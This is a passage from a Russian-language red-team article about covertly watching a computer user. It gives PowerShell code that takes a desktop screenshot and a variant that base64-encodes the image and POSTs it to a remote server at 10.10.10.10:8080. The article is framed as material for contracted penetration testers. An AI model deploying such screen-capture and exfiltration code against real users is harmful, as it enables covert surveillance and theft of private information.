При ред­тимин­ге иног­да при­ходит­ся изу­чать обста­нов­ку не толь­ко внут­ри сети, но и за ее пре­дела­ми. В час­тнос­ти, по ту сто­рону монито­ра. Работа­ет ли кто‑то за устрой­ством в текущий момент, какое окно откры­то, что говорят в мик­рофон. Давай пос­мотрим, как мож­но, исполь­зуя легитим­ные воз­можнос­ти сис­темы, сле­дить за ничего не подоз­рева­ющим поль­зовате­лем.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Боль­шая часть того, что мы реали­зуем в этой статье, есть толь­ко в Metasploit и в Cobalt Strike. Пер­вый написан на Ruby, а исходни­ки вто­рого зак­рыты. Дру­гих реали­заций я с ходу и не назову, а ведь хочет­ся иметь корот­кие и акку­рат­ные при­меры кода, которые мож­но без проб­лем добавить в собс­твен­ную прог­рамму.

Впро­чем, у меня получи­лось самос­тоятель­но все реали­зовать на C#, а некото­рые прог­раммы — на C++ и PowerShell.

Скриншот рабочего стола

Пер­вооче­ред­ная задача — скрин­шоты. Нуж­но уви­деть, что откры­то у текуще­го поль­зовате­ля, в каких прог­раммах он работа­ет и чем сей­час занима­ется.

Ка­залось бы, такая три­виаль­ная задача дает­ся в вось­мом клас­се в качес­тве лет­ней домаш­ки на пас­кале, но не тут‑то было. Авто­ры мно­жес­тва реали­заций забыва­ют об одной инте­рес­ной детали. Догадал­ся, о какой?

По­ка дума­ешь, покажу тебе при­мер кода на PowerShell. Даже с его помощью мож­но сде­лать скрин­шот текуще­го рабоче­го сто­ла.

# Отправляем нажатие клавиши Print Screen, которое сделает скриншот всех экранов [ Windows. Forms. SendKeys ]: : SendWait ( "{ PRTSC} " ) # Даем системе время, чтобы обработать нажатие клавиши и получить изображение в буфер обмена Start-Sleep -Milliseconds 250 # Получаем изображение из буфера обмена $img = [ Windows. Forms. Clipboard ]: : GetImage ( ) # Сохраняем изображение в файл $filePath = "C:\ 1. png" $img . Save ( $filePath , [ System. Drawing. Imaging. ImageFormat ]: : Png ) # Выводим информацию о местоположении сохраненного файла Write-Host "Скриншот сохранён в файле: $filePath "

Скрипт работа­ет пре­дель­но прос­то — ими­тиру­ет нажатие кноп­ки Print Screen.

В интерне­те мож­но даже встре­тить вари­ант с авто­мати­чес­кой отправ­кой кар­тинки на веб‑сер­вер.

[ Windows. Forms. Sendkeys ]: : SendWait ( "{ PrtSc} " ) Start-Sleep -Milliseconds 250 $x = New-Object System. IO. MemoryStream [ Windows. Forms. Clipboard ]: : GetImage ( ) . Save ( $x , [ System. Drawing. Imaging. ImageFormat ]: : Png ) Invoke-WebRequest -Uri "http:// 10. 10. 10. 10: 8080/ upload?test. png" -Method POST -Body ( [ Convert ]: : ToBase64String ( $x . ToArray ()) )

Ну как, догадал­ся, что не учел автор? У поль­зовате­ля может быть нес­коль­ко монито­ров! Нап­ример, как у меня.

Что, если хит­рый сисад­мин ута­щил к себе нес­коль­ко монито­ров и поль­зует­ся ими в свое удо­воль­ствие? Мы из‑за это­го рис­куем упус­тить важ­ную информа­цию из виду!

Это нак­ладыва­ет некото­рые огра­ниче­ния на выбор наших инс­тру­мен­тов. Если прос­то слать нажатие Print Screen через Windows. Forms , то получа­ем изоб­ражение с текуще­го монито­ра, что нас не устра­ивает.